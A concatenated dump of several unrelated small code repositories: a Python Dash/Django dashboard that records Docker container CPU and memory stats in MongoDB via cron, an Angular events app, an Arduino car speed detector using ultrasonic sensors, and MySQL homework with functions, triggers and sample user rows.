f = open(self.file,'a+')
f.write('saved')
if data != None:
self.db.timestamp.insert_one(data)
f.close()
def make_space_db(self):
f = open(self.file,'a+')
f.write('full ')
self.db.timestamp.delete_one({'_id':self.db.timestamp.find()[0]['_id']})
f.close()
def is_db_full(self):
if self.db.timestamp.find({}).count() == 60:
return True
return False
def get_scheduled_job():
#f = open('/home/sohdatta/my-gcc-app/myproject/project/test','a+')
stat = Stat()
if stat.is_db_full():
stat.make_space_db()
stat.save_to_db()
if __name__ == '__main__':
get_scheduled_job()
'''
def main():
docker = docker.APIClient(base_url='unix://var/run/docker.sock')
client = MongoClient()
db = client.test
for i in range(7):
docker.create_container('my-gcc-app',detach=True)
docker.run_containers()
for stat in docker.generate_stats():
global_stat_dict={} #document in mongodb
global_stat_dict["time"]=get_time()
stat_list = []
for stat_container in stat:
stat_dict = {}
_id = stat_container["id"]
name=stat_container["name"]
cpu_usage= stat_container["cpu_stats"]["cpu_usage"]["total_usage"]
memory_usage=stat_container["memory_stats"]["usage"]
stat_dict["id"]=_id
stat_dict["name"]=name
stat_dict["cpu_usage"]=cpu_usage
stat_dict["memory_usage"]=memory_usage
stat_list.append(stat_dict)
global_stat_dict["stat_list"] = stat_list
db.test_table.insert_one(global_stat_dict) #storing each document in test_table collection
pprint(global_stat_dict,width=1)
if __name__ == '__main__':
main()
'''
<file_sep>file_path=$PWD/"dbstore.py"
py=`which python`
command="$py $file_path"
crontab -l > mycron
echo "*/1 * * * * $command" >> mycron
crontab mycron
rm mycron
<file_sep>import dash
import dash_html_components as html
import dash_core_components as dcc
from app import app
layout = html.Div([
html.H4('App 2'),
dcc.Link('Go to App 1',href='/apps/app1'),
dcc.Link('Go home',href = '/')
])
<file_sep>from pymongo import MongoClient
class mongoGuest:
    """Thin read layer over the local `test` database's `timestamp` collection."""

    def __init__(self):
        self.db = MongoClient().test

    def find_cpu_percentage(self, con):
        """CPU percentage for one container sample (docker-stats delta formula)."""
        delta_container = con["cpu_usage"] - con["pre_cpu_usage"]
        delta_system = con["system_cpu_usage"] - con["presystem_usage"]
        if delta_container > 0.0 and delta_system > 0.0:
            return delta_container / delta_system * con["online_cpus"] * 100.0
        return 0.0

    def get_cpu_usage(self, cont_id, percent=False):
        """Return (tick_numbers, cpu_values) for the container named `cont_id`."""
        values = []
        for doc in self.db.timestamp.find():
            for sample in doc['stats']:
                if sample['name'] == cont_id:
                    if percent == True:
                        values.append(self.find_cpu_percentage(sample))
                    else:
                        values.append(sample["cpu_usage"])
        # Ticks are simply 1..n, one per collected sample.
        ticks = list(range(1, len(values) + 1))
        return (ticks, values)

    def get_memory_usage(self, cont_id):
        """Return (tick_numbers, memory_values) for the container named `cont_id`."""
        values = [sample['memory_usage']
                  for doc in self.db.timestamp.find()
                  for sample in doc['stats']
                  if sample['name'] == cont_id]
        ticks = list(range(1, len(values) + 1))
        return (ticks, values)
<file_sep>from datetime import datetime,timedelta
from pymongo import MongoClient
import docker
from time import sleep
class dockerGuest:
def __init__(self):
self.client = docker.APIClient(base_url = 'unix://var/run/docker.sock')
def container_list(self):
return self.client.containers()
def get_stats(self):
stat_list = []
container_list = self.container_list()
if len(container_list) == 0:
return None
for container in container_list:
_id = container['Id']
_dict = self.client.stats(container=_id,stream=False)
stat_dict = {}
stat_dict["_id"] = _id
stat_dict["name"] = _dict["name"][1:]
stat_dict["cpu_usage"] = _dict["cpu_stats"]["cpu_usage"]["total_usage"]
stat_dict["memory_usage"] = _dict["memory_stats"]["usage"]
stat_list.append(stat_dict)
return stat_list
class Stat:
    """Samples local docker containers and stores snapshots in test.timestamp."""

    def __init__(self):
        self.docker = dockerGuest()
        self.client = MongoClient()
        self.db = self.client.test

    @staticmethod
    def get_time():
        """Return the current time formatted HH:MM:SS.

        NOTE(review): the +5:30 offset presumably converts UTC to IST --
        confirm the host clock's timezone before relying on it.
        """
        t = datetime.now() + timedelta(hours=5, minutes=30)
        return t.strftime("%H:%M:%S")

    def data_to_save(self):
        """Build one document {time, stats}; None when no containers are running."""
        stats = self.docker.get_stats()
        if stats is None:
            return None
        return {"time": Stat.get_time(), "stats": stats}

    def save_to_db(self):
        """Insert a snapshot, skipping the write when there is nothing to save."""
        data = self.data_to_save()
        if data is not None:
            self.db.timestamp.insert_one(data)

    def make_space_db(self):
        """Evict the first document the cursor yields.

        FIX: the original referenced the bare name `db` (a NameError) instead
        of `self.db`, so eviction always crashed.
        """
        self.db.timestamp.delete_one({'_id': self.db.timestamp.find()[0]['_id']})

    def is_db_full(self):
        """True once the collection holds 60 or more documents.

        FIX: `>=` instead of `==` so an already-over-full collection still
        reports full.
        """
        if self.db.timestamp.find({}).count() >= 60:
            return True
        return False
def get_scheduled_job():
stat = Stat()
if stat.is_db_full():
stat.make_space_db()
stat.save_to_db()
if __name__ == '__main__':
get_scheduled_job()
'''
def main():
docker = docker.APIClient(base_url='unix://var/run/docker.sock')
client = MongoClient()
db = client.test
for i in range(7):
docker.create_container('my-gcc-app',detach=True)
docker.run_containers()
for stat in docker.generate_stats():
global_stat_dict={} #document in mongodb
global_stat_dict["time"]=get_time()
stat_list = []
for stat_container in stat:
stat_dict = {}
_id = stat_container["id"]
name=stat_container["name"]
cpu_usage= stat_container["cpu_stats"]["cpu_usage"]["total_usage"]
memory_usage=stat_container["memory_stats"]["usage"]
stat_dict["id"]=_id
stat_dict["name"]=name
stat_dict["cpu_usage"]=cpu_usage
stat_dict["memory_usage"]=memory_usage
stat_list.append(stat_dict)
global_stat_dict["stat_list"] = stat_list
db.test_table.insert_one(global_stat_dict) #storing each document in test_table collection
pprint(global_stat_dict,width=1)
if __name__ == '__main__':
main()
'''
<file_sep>from django.db import models
from mongoengine import *
# Create your models here.
# MongoEngine documents mirroring the collector's per-timestamp snapshots.
class Container(EmbeddedDocument):
    # Docker container id.
    _id = StringField(required=True)
    # Container name (the collectors strip docker's leading '/').
    name = StringField(required=True)
    # NOTE(review): cpu/memory are declared as strings although the
    # collectors produce integers -- confirm nothing relies on that.
    cpu_usage = StringField(required=True)
    memory_usage = StringField(required=True)
class Timestamp(Document):
    # Sample time. NOTE(review): one collector stores strftime'd strings,
    # another stores datetimes -- confirm which one feeds this model.
    time = StringField(required=True)
    # One Container entry per running container at this time.
    stats = ListField(EmbeddedDocumentField(Container))
<file_sep>from pymongo import MongoClient
import random
db = MongoClient().test
def get_random_time():
    """Return a random wall-clock time as "H:M:S" (components unpadded).

    FIX: random.randint is inclusive at both ends, so the original could
    produce invalid times such as hour 24 or minute/second 60.
    """
    hour = random.randint(0, 23)
    minute = random.randint(0, 59)
    second = random.randint(0, 59)
    return "{}:{}:{}".format(hour, minute, second)
def get_random_number():
return random.randint(0,100)
def check_time(time):
    """Parse an "H:M:S" string into an (hour, minute, second) tuple of ints.

    Used as the sort key when ordering the generated random times.
    """
    parts = time.split(":")
    return (int(parts[0]), int(parts[1]), int(parts[2]))
def main():
    """Seed db.timestampdata with 1000 random (time, value) documents, inserted in chronological order."""
    random_time=[]
    for _ in range(1000):
        random_time.append(get_random_time())
    # Sort chronologically using the (hour, minute, second) tuple key.
    random_time = sorted(random_time,key=check_time)
    for i in range(1000):
        data = {}
        data['time']=random_time[i]
        data['value']=get_random_number()
        db.timestampdata.insert_one(data)
    #print(random_time[0:50])
if __name__ =='__main__':
main()
<file_sep>from crontab import CronTab
import os
class CTab:
    """Small convenience wrapper around python-crontab's CronTab."""

    def __init__(self, username=None):
        self.cron = CronTab(user=username)

    def print_job(self, comment=None):
        '''
        Args:
            comment: print only the job(s) carrying this comment;
                     print every job when omitted.
        '''
        if comment:
            print('The Job is...')
            for job in self.cron:
                if job.comment == comment:
                    print(job)
        else:
            print('All the jobs are..')
            for job in self.cron:
                print(job)

    def add_job(self, command, interval, comment=None):
        '''
        Args:
            command: command line the job will execute,
            interval: run every `interval` minutes,
            comment: a comment for the job (optional but recommended;
                     it is the handle remove_job matches on)
        '''
        job = self.cron.new(command=command, comment=comment)
        job.minute.every(interval)
        self.cron.write()
        print('Job added successfully...')

    def remove_job(self, comment=None):
        '''
        Args:
            comment: remove only the job(s) carrying this comment;
                     remove every job when omitted.
        '''
        if comment:
            # FIX: collect the matches first -- removing entries from the
            # crontab while iterating it can skip entries.
            matches = [job for job in self.cron if job.comment == comment]
            for job in matches:
                self.cron.remove(job)
                print("Job removed...")
        else:
            self.cron.remove_all()
            print('All jobs removed..')
        self.cron.write()
if __name__ == '__main__':
import sys
cron = CTab('sohdatta')
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,'test.py')
command = 'python ' + file_path
comment = 'Storing container stats in mongodb'
if len(sys.argv) > 1 and sys.argv[1] == 'remove':
cron.remove_job()
else:
cron.add_job(command,1,comment)
<file_sep>import os
from datetime import datetime
from pymongo import MongoClient
def main():
dir_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(dir_path,'logfile')
f = open(file_path,'a')
f.write('its working: {}'.format(datetime.now()))
db = MongoClient().test
f.write("object created")
data ={'time':str(datetime.now())}
db.testingcon.insert_one(data)
f.write("document inserted")
f.close()
main()
<file_sep>#FROM ubuntu:latest
#RUN apt-get update
#RUN apt-get install -y software-properties-common vim
#RUN add-apt-repository ppa:jonathonf/python-3.6
#RUN apt-get update
#RUN apt-get install -y build-essential python3.6 python3.6-dev python3-pip python3.6-venv
#RUN python3.6 -m pip install pip --upgrade
#RUN python3.6 -m pip install wheel
FROM python:3.6
WORKDIR /app
ADD . /app
RUN pip install -r requirements.txt
RUN pip install plotly --upgrade
<file_sep>from django.shortcuts import render
from . import models
# Create your views here.
def index(request):
    """Landing page."""
    return render(request,'index.html')
def full_list(request):
    """List every stored Timestamp document."""
    data = models.Timestamp.objects()
    return render(request,'full_list.html',{'data':data})
def detail_page(request,ts):
    """Show the container stats captured at timestamp `ts`."""
    data = models.Timestamp.objects(time=ts)
    return render(request,'detail_page.html',{'data':data})
def usage_detail_page(request,ts,name,usage=None):
    """Show one usage metric (`usage`) of container `name` at timestamp `ts`."""
    data = models.Timestamp.objects(time=ts)
    return render(request,'usage_detail_page.html',{'data':data,'name':name,'usage':usage})
<file_sep>if [ $1=="remove" ]
then
crontab -r
elif [ $1=="add" ]
then
file_path=$PWD/"test.py"
command="python $file_path"
crontab -l > mycron
echo "*/1 * * * * $command" >> mycron
crontab mycron
rm mycron
fi
<file_sep>import dash
from dash.dependencies import Output,Input,Event,State
import dash_core_components as dcc
import dash_html_components as html
import plotly
from dockerGuest import dockerGuest
import random
docker=dockerGuest()
app = dash.Dash(__name__)
#image_list = docker.image_list()
#----------------APP LAYOUT------------------#
app.layout = html.Div([
html.Div([
html.Div([
html.H3("Click below to see the list of containers"),
html.Div([
html.Button(id='generate-container-list',n_clicks=0,children='Show Containers',className='btn btn-primary')
],style={'marginTop':'30px'}),
html.Div([
html.P(children=[
html.H3(['Containers: ',
html.Span(id='list-length'),]),
]),
],id='div-list-length',style={'marginTop':'30px'}),
html.Div([
dcc.Dropdown(id='container-image-list',disabled=True),
]),
],className='left-row1'),
html.Div([
html.H3('Usages'),
dcc.Dropdown(
id='usages',
options=[{'label':'CPU','value':'cpu_usage'},{'label':'Memory','value':'mem_usage'}],
),
],id='left-row-2',className='left-row2',style={'display':'none'}),
],className ='col-md-2',style={'backgroundColor':'#E6E6FA','marginLeft':'-65'}),
html.Div(className='col-md-10'),
],className='container')
#---------------------------------------------#
@app.callback(Output('left-row-2','style'),
[Input('generate-container-list','n_clicks')])
def update(n_clicks):
l = len(docker.image_list())
if n_clicks > 0:
if l==0:
return {'display':'none'}
else:
return {'display':'block'}
@app.callback(Output('container-image-list','disabled'),
[Input('generate-container-list','n_clicks')])
def enable_dlist(n_clicks):
l = len(docker.image_list())
if n_clicks>0:
if l==0:
return True
else:
return False
@app.callback(Output('list-length','children'),
    [Input('generate-container-list','n_clicks')])
# NOTE(review): this redefines `update`, already used for the callback on
# Output('left-row-2','style') earlier in this file. Dash keeps its own
# reference from decoration time, so both callbacks still fire, but the
# module-level name now shadows the first definition -- rename one of them.
def update(n_clicks):
    """Show the image count once the button has been clicked at least once."""
    if n_clicks > 0:
        return '{}'.format(len(docker.image_list()))
@app.callback(Output('container-image-list','options'),
[Input('generate-container-list','n_clicks')])
def generate_list(n_clicks):
if n_clicks > 0:
return [{'label':i,'value':i} for i in docker.image_list()]
#---------------Bootstrap CSS-------------------#
my_css_url = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css'
app.css.append_css({
"external_url":my_css_url
})
#------------------------------------------------#
if __name__ == '__main__':
app.run_server(debug=True,host='0.0.0.0',port=8888)
| a485c471f11426077bf57030c045c6b139317d09 | [
"Python",
"Text",
"Dockerfile",
"Shell"
] | 23 | Python | sohamdats/mydashapp | 20e11cceeaf0188d79a15fb44e53a17cd7a76e5f | 178c5e9fa55ba48c96b817113f9e90c0694dd24f |
refs/heads/master | <repo_name>leshij-2005/tochka-test<file_sep>/src/app/events/events.component.ts
import { Component, OnInit } from '@angular/core';
import { EventService } from './event.service';
import { Article } from '../article/article';
@Component({
selector: 'app-events',
templateUrl: './events.component.html',
styleUrls: ['./events.component.scss']
})
export class EventsComponent implements OnInit {
    // Events currently displayed; filled asynchronously from the service.
    events = [];
    // Field the list is currently sorted by.
    sortBy:string = 'date';
    constructor(private eventService: EventService) {}
    // Subscribe to the service and keep the local list in sync.
    getEvents(): void {
        this.eventService.getEvents()
            .subscribe(events => this.events = events);
    }
    ngOnInit() {
        this.getEvents();
    }
    // Sort the list in place by the given field, ascending.
    sort(type: string): void {
        this.sortBy = type;
        this.events.sort((a, b) => a[type] > b[type] ? 1 : -1);
    }
}<file_sep>/src/app/app-routing.module.ts
import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { ArticleComponent } from './article/article.component';
import { TransactionComponent } from './transaction/transaction.component';
import { EventsComponent } from './events/events.component';
import { EventAddComponent } from './add/add.component';
const routes: Routes = [
{ path: '', redirectTo: '/events', pathMatch: 'full' },
{ path: 'events', component: EventsComponent },
{ path: 'add/:type', component: EventAddComponent },
{ path: 'article/:id', component: ArticleComponent },
{ path: 'transaction/:id', component: TransactionComponent },
];
@NgModule({
imports: [ RouterModule.forRoot(routes) ],
exports: [ RouterModule ]
})
export class AppRoutingModule {}<file_sep>/src/app/events/event.service.ts
import { Injectable } from '@angular/core';
import { Observable, of } from 'rxjs';
import { events } from './mock-events';
import { EventEmitter } from 'events';
@Injectable({
  providedIn: 'root',
})
export class EventService {
  // In-memory store, lazily seeded from the mock data on first access.
  events = [];
  constructor() {}
  /** Emit all non-deleted events (seeding the store from the mocks if empty). */
  getEvents(): Observable<Object[]> {
    this.events = (this.events.length ? this.events : events).filter(event => !event.deleted);
    return of(this.events);
  }
  /** Emit the event with the given id (undefined when absent). */
  getEvent(id: number): Observable<Object> {
    if (!this.events.length) {
      this.events = events;
    }
    return of(this.events.find(event => event.id === id))
  }
  /**
   * Merge `data` into the stored event and emit it.
   * FIX: the original ignored `data` entirely, so e.g. marking an article
   * as read was never persisted in the service.
   */
  updateEvent(id: number, data: Object): Observable<Object> {
    const found = this.events.find(event => event.id === id);
    if (found) {
      Object.assign(found, data);
    }
    return of(found);
  }
  /**
   * Soft-delete the event; getEvents filters on the `deleted` flag.
   * FIX: the original returned true without touching the store.
   */
  deleteEvent(id: number): Observable<Object> {
    const found = this.events.find(event => event.id === id);
    if (found) {
      found.deleted = true;
    }
    return of(true);
  }
  /** Stamp the event with a date and a fresh id, store it, and emit it. */
  addEvent(event: any): Observable<Object> {
    event.date = new Date();
    // FIX: length + 1 can collide with an existing id after deletions;
    // derive the next id from the current maximum instead.
    event.id = this.events.reduce((m, e) => Math.max(m, e.id), 0) + 1;
    this.events.push(event);
    return of(event);
  }
}<file_sep>/src/app/article/article.ts
export class Article {
id: number;
date: Date;
title: string;
content: string;
isRead: boolean;
deleted: boolean;
}<file_sep>/src/app/add/add.component.ts
import { Component, OnInit, Input } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { Location } from '@angular/common';
import { EventService } from '../events/event.service';
@Component({
selector: 'app-event-add',
templateUrl: './add.component.html',
styleUrls: ['./add.component.scss']
})
export class EventAddComponent implements OnInit {
@Input() event: any;
constructor(private route: ActivatedRoute, private eventService: EventService, private location: Location) {
this.event = {
deleted: false,
};
}
goBack(): void {
this.location.back();
}
ngOnInit(): void {
this.getType();
}
getType(): void {
const type = this.route.snapshot.paramMap.get('type');
this.event.type = type;
}
add(): void {
this.eventService.addEvent(this.event)
.subscribe(() => {
this.goBack();
});
}
}<file_sep>/src/app/transaction/transaction.ts
export class Transaction {
id: number;
date: Date;
amount: number;
currency: string;
from: string;
description: string;
direction: string;
deleted: boolean;
}<file_sep>/src/app/article/article.component.ts
import { Component, OnInit, Input } from '@angular/core';
import { ActivatedRoute } from '@angular/router';
import { Location } from '@angular/common';
import { Article } from './article';
import { EventService } from '../events/event.service';
/**
 * Displays a single article, loaded from the `id` route parameter, and lets
 * the user mark it as read.
 */
@Component({
  selector: 'app-article',
  templateUrl: './article.component.html',
  styleUrls: ['./article.component.scss']
})
export class ArticleComponent implements OnInit {
  @Input() article: Article;

  constructor(private route: ActivatedRoute, private eventService: EventService, private location: Location) {}

  ngOnInit(): void {
    this.get();
  }

  /** Loads the article whose id is in the current route. */
  get(): void {
    const id = +this.route.snapshot.paramMap.get('id');
    this.eventService.getEvent(id)
      .subscribe((event: Article) => this.article = event);
  }

  /** Returns to the previous location in browser history. */
  goBack(): void {
    this.location.back();
  }

  /**
   * Marks the article as read, then navigates back.
   *
   * Fix: the original called goBack() synchronously after subscribing, so
   * with an asynchronous service the navigation could fire before the update
   * completed. goBack() now runs inside the subscription callback, matching
   * the pattern used by EventAddComponent.add().
   */
  read(): void {
    this.eventService.updateEvent(this.article.id, {isRead: true})
      .subscribe(() => {
        this.article.isRead = true;
        this.goBack();
      });
  }
} | 1162faca13e3a9368a38bb65746d3e23087cb44f | [
"TypeScript"
] | 7 | TypeScript | leshij-2005/tochka-test | d1e3c2dfbfeaa4ee7784f334b6b6d1f46cb80bcb | f76651cfe79946501d8ff1d6d7520c306e775495 |
refs/heads/master | <repo_name>JasonliEio/CopyMeituan<file_sep>/README.md
# CopyMeituanUI
山寨美团UI



<file_sep>/山寨团/Default/Default.h
// Notification names and userInfo keys shared across the app.
extern NSString *const CityDidChangeNotification; // posted when the selected city changes
extern NSString *const SelectCityName;
extern NSString *const SortDidChangeNotification; // posted when the sort order changes
extern NSString *const SelectSort;
extern NSString *const CategoryDidChangeNotification; // posted when the category selection changes
extern NSString *const SelectCategory;
extern NSString *const SelectSubCategoryName;
extern NSString *const RegionDidChangeNotification; // posted when the region of the current city changes
extern NSString *const SelectRegion;
extern NSString *const SelectSubRegionName;
extern NSString *const CollectDidChangeNotification; // posted by the favorites (collect) controller
extern NSString *const isCollectKey; // whether the deal was favorited or unfavorited
extern NSString *const CollectDealKey; // the favorited deal's data
| b7474d97f3ce6cb135e009cb7e321e5ba57887af | [
"Markdown",
"C"
] | 2 | Markdown | JasonliEio/CopyMeituan | 78a18f7b20e51f417244ff33b6184b8fd3f26358 | 2d62a5789ad48cdffe42c94e2752a27760ae4e9b |
refs/heads/main | <repo_name>Animesh810/Car_OverSpeeding_Detection_Arduino<file_sep>/Car Overspeeding Detection project.ino
/*
* The circuit:
* LCD RS pin to digital pin 26
* LCD Enable pin to digital pin 27
* LCD D4 pin to digital pin 30
* LCD D5 pin to digital pin 31
* LCD D6 pin to digital pin 32
* LCD D7 pin to digital pin 33
* LCD R/W pin to ground
* LCD VSS pin to ground
* LCD VCC pin to 5V
* 10K resistor:
* ends to +5V and ground
*/
#include <LiquidCrystal.h>
// 16x2 character LCD wired as RS=26, E=27, D4=30, D5=31, D6=32, D7=33.
LiquidCrystal lcd(26, 27, 30, 31, 32, 33);
int trigPin1=50; // trigger pin of the first HC-SR04 sensor
int echoPin1=51; // echo pin of the first HC-SR04 sensor
int trigPin2=41; // trigger pin of the second HC-SR04 sensor
int echoPin2=40; // echo pin of the second HC-SR04 sensor
unsigned long time1,time2; // millis() timestamps when each sensor detects the car
long timewa; // elapsed time between the two detections, in ms
double speedwa; // computed speed, in cm/s
long duration1, distance1; // echo pulse width (us) and distance (cm), sensor 1
long duration2, distance2; // echo pulse width (us) and distance (cm), sensor 2
// One-time hardware initialisation: serial port, the two HC-SR04
// ultrasonic sensors, and the 16x2 LCD.
void setup() {
  Serial.begin(9600);
  // Both sensors: trigger pins drive the pulse, echo pins are read back.
  pinMode(trigPin1, OUTPUT);
  pinMode(trigPin2, OUTPUT);
  pinMode(echoPin1, INPUT);
  pinMode(echoPin2, INPUT);
  lcd.begin(16, 2);
  lcd.print("Measuring!!!");
}
// Fires one 10 us trigger pulse on the given HC-SR04 and converts the echo
// pulse width to centimetres (same integer-truncating arithmetic as the
// original: (duration/2)/29.1).
static long measureDistanceCm(int trigPin, int echoPin, long &duration) {
  digitalWrite(trigPin, LOW);
  delayMicroseconds(2);
  digitalWrite(trigPin, HIGH);
  delayMicroseconds(10);
  digitalWrite(trigPin, LOW);
  duration = pulseIn(echoPin, HIGH);
  return (duration / 2) / 29.1;
}

// Busy-polls one sensor until something is detected within 1..30 cm (or the
// attempt budget runs out, in which case `timestamp` keeps its old value,
// as in the original).  On detection, records the millis() timestamp.
// Refactor: the original duplicated this whole loop inline for each sensor
// and carried large runs of commented-out debug prints; behavior is kept,
// writing through the same file-scope duration/distance/time globals.
static void waitForDetection(int trigPin, int echoPin,
                             long &duration, long &distance,
                             unsigned long &timestamp) {
  for (long attempt = 0; attempt < 999999; attempt++) {
    distance = measureDistanceCm(trigPin, echoPin, duration);
    if (distance <= 30 && distance >= 1) {
      timestamp = millis();
      break;
    }
  }
}

// Main cycle: wait for the car to pass sensor 1 then sensor 2, compute its
// speed from the elapsed time, show it on the LCD, and warn on overspeed.
void loop() {
  waitForDetection(trigPin1, echoPin1, duration1, distance1, time1);
  waitForDetection(trigPin2, echoPin2, duration2, distance2, time2);
  lcd.clear();
  timewa = time2 - time1;
  // 15000.00 = sensor spacing (cm) x 1000 ms/s — presumably the sensors
  // are 15 cm apart; confirm against the hardware setup/report.
  speedwa = 15000.00 / timewa;
  Serial.print("Speed ");
  Serial.print(speedwa);
  Serial.println("cm/s");
  lcd.setCursor(0, 0);
  lcd.print("Speed in cm/s");
  lcd.setCursor(0, 1);
  lcd.print(speedwa);
  if (speedwa >= 100) {
    // Overspeed: flash an alert for one second, then restore the reading.
    lcd.clear();
    lcd.setCursor(0, 0);
    lcd.print("ALERT!!!!!");
    lcd.setCursor(0, 1);
    lcd.print("OVERSPEEDING ");
    delay(1000);
    lcd.clear();
    lcd.setCursor(0, 0);
    lcd.print("Speed in cm/s");
    lcd.setCursor(0, 1);
    lcd.print(speedwa);
  } else {
    delay(1000);
    lcd.clear();
  }
}
<file_sep>/README.md
# Car_OverSpeeding_Detection_Arduino
This code implements the Car Over-Speeding Detection project on Arduino.
The project uses HC-SR04 ultrasonic sensors and prints the speed of the car on an LCD display.
Refer to the report for more details.
| c23b5a127663cea0d209e9de92cd88cf14e8a0a7 | [
"Markdown",
"C++"
] | 2 | C++ | Animesh810/Car_OverSpeeding_Detection_Arduino | 232b8af631224f8f1b6be2767600e8ec4ff77065 | 47648f0a80ad43d92354c54d9421dbb6427e3c62 |
refs/heads/main | <file_sep>-- Хранимые процедуры и функции, триггеры
-- 1.Создайте хранимую функцию hello(), которая будет возвращать приветствие, в зависимости от текущего времени суток.
-- С 6:00 до 12:00 функция должна возвращать фразу "Доброе утро", с 12:00 до 18:00 функция должна возвращать фразу
-- "Добрый день", с 18:00 до 00:00 — "Добрый вечер", с 00:00 до 6:00 — "Доброй ночи".
-- Returns a Russian greeting that depends on the current time of day.
-- Fixes two defects in the original version:
--   * `BETWEEN '18:00:01' AND '00:00:00'` is an empty interval (BETWEEN
--     needs low <= high), so the evening branch never matched and a CASE
--     with no ELSE then raised "Case not found" for evening times;
--   * no DETERMINISTIC / NO SQL / READS SQL DATA characteristic was
--     declared, causing MySQL error 1418 with binary logging enabled.
--     NO SQL is declared because the body touches no tables; the function
--     is still NOT DETERMINISTIC since it depends on CURTIME().
drop function if exists `hello`;
delimiter //
create function `hello`()
returns text
not deterministic
no sql
begin
	declare currenttime TIME;
	set currenttime = curtime();
	-- Half-open intervals cover every moment of the day exactly once,
	-- including midnight itself (handled by the ELSE branch).
	case
		when currenttime >= '06:00:00' and currenttime < '12:00:00' then return "Доброе утро";
		when currenttime >= '12:00:00' and currenttime < '18:00:00' then return "Добрый день";
		when currenttime >= '18:00:00' then return "Добрый вечер";
		else return "Доброй ночи"; -- 00:00:00 .. 05:59:59
	end case;
end//
select hello()//
delimiter ;
-- 2.В таблице products есть два текстовых поля: name с названием товара и description с его описанием.
-- Допустимо присутствие обоих полей или одно из них. Ситуация, когда оба поля принимают неопределенное
-- значение NULL неприемлема. Используя триггеры, добейтесь того, чтобы одно из этих полей или оба поля были заполнены.
-- При попытке присвоить полям NULL-значение необходимо отменить операцию.
use homework;
-- Forbid product rows where BOTH name AND description are NULL.
-- Fix: the original covered only INSERT, but the task requires rejecting
-- any attempt to assign NULL to both fields, so an identical BEFORE UPDATE
-- trigger is added as well.
drop trigger if exists null_trigger;
delimiter //
create trigger null_trigger BEFORE INSERT ON products
FOR EACH ROW BEGIN
	IF NEW.name IS NULL AND NEW.description IS NULL THEN
		SIGNAL SQLSTATE '45000'
		SET MESSAGE_TEXT = 'NULL-alert';
	END IF;
END//
drop trigger if exists null_trigger_update//
create trigger null_trigger_update BEFORE UPDATE ON products
FOR EACH ROW BEGIN
	IF NEW.name IS NULL AND NEW.description IS NULL THEN
		SIGNAL SQLSTATE '45000'
		SET MESSAGE_TEXT = 'NULL-alert';
	END IF;
END//
delimiter ;
INSERT INTO products (name, description, price, catalog_id)
VALUES (NULL, NULL, 100500, 8);<file_sep>use snet0611;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Дарья','Попова','<EMAIL>',8151557164,'f','1984-11-28','Воронеж',NULL,'32afa0b02c8399d1960509c3fbd4cc75ab4dcce2','2020-09-25 22:09:27.0')
,('Ирина','Гончарова','<EMAIL>',2907266453,'f','1984-08-24','Самара',NULL,'afd3e457d3b9f6f880623163ea8f72889777a58b','2020-09-25 22:09:27.0')
,('Марина','Закусилова','<EMAIL>',5949091863,'f','1981-04-16','Новосибирск',NULL,'9154186410a62369bdf4fd2bd632ca3511b270a7','2020-09-25 22:09:27.0')
,('Елена','Нагина','<EMAIL>',6966471579,'f','1988-08-10','Пермь',NULL,'9bc443a6e52541784d52b69acc39343526886b11','2020-09-25 22:09:27.0')
,('Валерия','Платошкина','<EMAIL>',1078902682,'f','1980-01-07','Красноярск',NULL,'229aedb0a417bccab3ee0cbd89a4b1afaa080c51','2020-09-25 22:09:27.0')
,('Станислав','Светляков','<EMAIL>',9642922963,'m','1984-05-19','Тюмень',NULL,'584b9241b06cfe87131bfdba7b53e877ec3bd940','2020-09-25 22:09:27.0')
,('Ирина','Черникова','<EMAIL>',3118473791,'f','1982-10-20','Екатеринбург',NULL,'129797dcb95127ce0541faa8d91d8f1969da0f45','2020-09-25 22:09:27.0')
,('Алиса','Зайцева','<EMAIL>',4568198247,'f','1989-04-03','Воронеж',NULL,'ea63b484704b7a8316da4025260b864453adb948','2020-09-25 22:09:27.0')
,('Ольга','Застрожнова','<EMAIL>',9259428337,'f','1983-05-07','Москва',NULL,'9b1f31426e9caf75d46b9b4a7c58c1941daa33f0','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ирина','Сушкова','<EMAIL>',9442875153,'f','1984-12-19','Волгоград',NULL,'9d0f9f7cdbe467af211a5d5bc91e2e16da891521','2020-09-25 22:09:27.0')
,('Анна','Бавыкина','<EMAIL>',6774820315,'f','1982-04-19','Казань',NULL,'3866567f83079af02f517913d98a34e8a5514111','2020-09-25 22:09:27.0')
,('Марина','Киреева','<EMAIL>',4056088011,'f','1984-04-26','Казань',NULL,'37cda6f77b46bb92ebfea535bdd89d6a145ee28a','2020-09-25 22:09:27.0')
,('Елена','Михайлова','<EMAIL>',2159168663,'f','1980-02-08','Красноярск',NULL,'340287d956987900a051e920136b2c1c17351321','2020-09-25 22:09:27.0')
,('Любовь','Чиликова','<EMAIL>',2619617364,'f','1983-11-22','Тольятти',NULL,'d4a54226f86124d38f463d60c3658a32be191e0e','2020-09-25 22:09:27.0')
,('Елена','Селиванова','<EMAIL>',1315489478,'f','1982-03-27','Волгоград',NULL,'4cbd30f625fd3440804baf6f509246e8ff81d46b','2020-09-25 22:09:27.0')
,('Сергей','Лисовой','<EMAIL>',1253462931,'m','1988-08-03','Краснодар',NULL,'89d65795895ed1c2f48114474ef37c92e1796dee','2020-09-25 22:09:27.0')
,('Михаил','Назарьев','<EMAIL>',8696039405,'m','1984-06-06','Волгоград',NULL,'011af674acb2a19440bb6a013d33dd9a231d53a4','2020-09-25 22:09:27.0')
,('Алексей','Метлицкий','<EMAIL>',2981339919,'m','1980-04-24','Краснодар',NULL,'e3e589b0cc498fb982ed1cbae5d20d3766e97b36','2020-09-25 22:09:27.0')
,('Эльвира','Белоусова','<EMAIL>',4051023201,'f','1987-12-19','Челябинск',NULL,'2def62b6a77064a15b157222f1b43bb538a0293e','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Екатерина','Власова','<EMAIL>',7146665929,'f','1984-04-11','Краснодар',NULL,'eb7fabdc4b4f70445a27467544e2a742dfad7bbb','2020-09-25 22:09:27.0')
